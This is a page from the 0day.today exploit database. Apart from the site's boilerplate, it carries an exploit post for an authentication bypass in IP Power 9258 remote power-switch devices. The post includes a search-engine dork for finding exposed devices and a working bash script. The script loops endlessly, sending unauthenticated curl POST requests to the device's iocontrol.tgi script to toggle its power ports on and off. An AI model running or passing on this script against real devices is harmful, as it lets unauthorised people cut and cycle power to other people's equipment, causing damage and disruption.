0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
IP Power 9258+ Authentication Bypass
| | | | | | | | __ \ _` | | | _ \ __| _` | __| _ \ _` | | | | | ( | | | ( | ( ( | | __/ ( | \___/ _| _|\__,_|_|_|\___/ \___|\__,_|\__|\___|\__,_| ___| \___ \ __ \ _` | __| _ \ | | | ( | ( __/ _____/ .__/ \__,_|\___|\___| _| |Teach, Learn, Party|Teach, Learn, Party|Teach, Learn, Party| irc.efnet.net #unallocatedspace --=+Multiple Remote Exploits in IP Power 9258+=-- by Crypt0s IP Power is a Taiwanese company specializing in remote access devices that let you turn on/off power ports via and ethernet connection. They certainly are remote access! Their IP Power 9258 line of devices run a firmware that is supposedly "secure" but in fact just doesnt let you see the HTML output of the scripts on the device without the appropriate login cookie. Fortunantly, the /tgi/ (synonymous with CGI) scripts folder is full of the CGI scripts that you need to operate the device, and they still accept post requests. GoogleDork: IP9258 Login Please enter Look on all major search engines, they all have one or two. This is made in Bash, mostly because this isn't worth scripting in Perl or Metasploit: #!/bin/bash args=("$@") while [ 1==1 ] do curl --data "P60=On&P60_TS=0&P60_TC=Off&P61=Off&P61_TS=0&P61_TC=Off&P62=Off&P62_TS=0&P62_TC=Off&P63=Off&P63_TS=0&P63_TC=Off&ButtonName=Apply" http://${args[0]}/tgi/iocontrol.tgi curl --data "P60=Off&P60_TS=0&P60_TC=Off&P61=On&P61_TS=0&P61_TC=Off&P62=Off&P62_TS=0&P62_TC=Off&P63=Off&P63_TS=0&P63_TC=Off&ButtonName=Apply" http://${args[0]}/tgi/iocontrol.tgi curl --data "P60=Off&P60_TS=0&P60_TC=Off&P61=Off&P61_TS=0&P61_TC=Off&P62=On&P62_TS=0&P62_TC=Off&P63=Off&P63_TS=0&P63_TC=Off&ButtonName=Apply" http://${args[0]}/tgi/iocontrol.tgi curl --data "P60=Off&P60_TS=0&P60_TC=Off&P61=Off&P61_TS=0&P61_TC=Off&P62=Off&P62_TS=0&P62_TC=Off&P63=On&P63_TS=0&P63_TC=Off&ButtonName=Apply" http://${args[0]}/tgi/iocontrol.tgi done # 0day.today [2024-12-25] #